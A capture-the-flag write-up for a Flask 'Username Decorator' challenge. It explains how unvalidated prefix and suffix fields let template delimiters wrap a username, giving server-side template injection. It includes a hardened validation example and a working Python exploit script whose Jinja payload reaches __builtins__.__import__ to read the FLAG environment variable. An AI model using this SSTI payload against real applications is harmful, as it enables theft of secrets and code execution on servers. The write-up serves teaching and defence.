Username Decorator

Description

Author: JW/Mani

My favorite social media platform, Prorope, has overhauled their username system and now supports prefixes and suffixes! Isn't that so cool?

For one, I know that I would really love to be the !! JW !!, so I made a website to preview these username changes.

Note: the flag is in an environment variable called FLAG

web3.zip

Analysis

import re

# Relevant parts of the challenge's app.py
app.config['FLAG_LOCATION'] = 'os.getenv("FLAG")'

def validate_username(username):
    # Allowlist: letters, digits, . _ [ ] ( ) - = , and at least two characters.
    # Braces, quotes and spaces are all rejected.
    return bool(re.fullmatch(r"[a-zA-Z0-9._\[\]\(\)\-=,]{2,}", username))

The validator only allows alphanumeric characters, dots, underscores, square brackets, parentheses, dashes, equals signs and commas, with a minimum length of two. Braces and quotes are not on the allowlist, so template delimiters cannot be placed in the username itself.

if request.method == 'POST':
    # Prefix and suffix are cut to two characters; the username is taken as-is.
    prefix   = (request.form['prefix']   or '')[:2]
    username =  request.form['username'] or ''
    suffix   = (request.form['suffix']   or '')[:2]

If the request method is POST, the prefix, username and suffix are read from the form. The prefix and suffix are truncated to their first two characters, but the username's length is not limited. Only the username passes through the validator; the prefix and suffix do not.

Since the application is written in Python, it is most likely using Jinja as its template engine. From the challenge description it looks like we can perform Server Side Template Injection (SSTI): the two-character prefix and suffix are just long enough to hold `{{` and `}}`, and the username, which only has to satisfy the allowlist, supplies the expression between them.
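The root cause described above is that the allowlist is applied to the username alone while the unvalidated prefix and suffix are concatenated around it, so the final string is never checked as a whole. The following added example (not part of the writeup or the challenge source, and written with the standard library only, so it does not render anything through Jinja) mirrors the challenge's assembly logic next to a hardened version that validates every field that reaches the output and rejects template delimiters in the assembled value. The `DECORATION_RE` allowlist for the prefix and suffix is an assumption of this example, not something the challenge defines.

```python
import re

# Allowlist copied from the challenge's validate_username: note that
# '{', '}', quotes and spaces are all rejected.
USERNAME_RE = re.compile(r"[a-zA-Z0-9._\[\]\(\)\-=,]{2,}")

# Assumed allowlist for the decorative prefix/suffix (not from the challenge):
# up to two characters, still with no braces or percent signs.
DECORATION_RE = re.compile(r"[a-zA-Z0-9!.*\-_=+~^]{0,2}")

# Anything that could open or close a Jinja statement/expression/comment.
TEMPLATE_DELIMITER_RE = re.compile(r"\{[{%#]|[}%#]\}")


def validate_username(username: str) -> bool:
    """Same check as the challenge: full match against the allowlist."""
    return bool(USERNAME_RE.fullmatch(username))


def assemble_as_challenge(prefix: str, username: str, suffix: str) -> str:
    """Mirrors the challenge: only the username is validated, the two-character
    prefix and suffix are glued on unchecked. '{{' + expr + '}}' gets through."""
    prefix = (prefix or "")[:2]
    suffix = (suffix or "")[:2]
    if not validate_username(username):
        raise ValueError("invalid username")
    return prefix + username + suffix


def assemble_hardened(prefix: str, username: str, suffix: str) -> str:
    """Validate each field, then validate the assembled value as a whole.
    The result is data to be passed as a template variable, never template
    source."""
    prefix = (prefix or "")[:2]
    suffix = (suffix or "")[:2]
    if not DECORATION_RE.fullmatch(prefix) or not DECORATION_RE.fullmatch(suffix):
        raise ValueError("invalid prefix or suffix")
    if not validate_username(username):
        raise ValueError("invalid username")
    display = prefix + username + suffix
    # Defence in depth: even if the field allowlists drift later, a value that
    # looks like template syntax must never leave this function.
    if TEMPLATE_DELIMITER_RE.search(display):
        raise ValueError("template delimiters are not allowed")
    return display


if __name__ == "__main__":
    # Constructed inputs: the legitimate decoration from the challenge text
    # and the delimiter-split shape of the writeup's payload.
    print(assemble_as_challenge("!!", "JW", "!!"))
    print(assemble_as_challenge("{{", "config.__class__", "}}"))  # passes unchanged
    try:
        assemble_hardened("{{", "config.__class__", "}}")
    except ValueError as exc:
        print("rejected:", exc)
```

The other half of the fix is on the rendering side: the assembled value should be handed to the template as a context variable (for example `render_template('preview.html', display=display)` in Flask) rather than concatenated into a string that is then passed to `render_template_string`, because no allowlist on the input can make user-supplied template source safe.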

Solution

import requests
from bs4 import BeautifulSoup as BS

URL = 'http://<SERVER>:<PORT>/'
# URL = 'http://127.0.0.1:5000' # Emulate server to test locally

# The two-character prefix and suffix supply the template delimiters, which
# the username validator rejects. The expression itself contains no quotes
# (also rejected), so the module name and variable name are read from the
# query string via request.args instead.
data = {
    'prefix': '{{',
    'suffix': '}}',
    'username': 'config.__class__.from_envvar.__globals__.__builtins__.__import__(request.args.a).getenv(request.args.b)'
}

params = { "a": "os", "b": "FLAG" }

resp = requests.post(URL, data=data, params=params)
html = BS(resp.text, 'html.parser')
print(html.prettify())
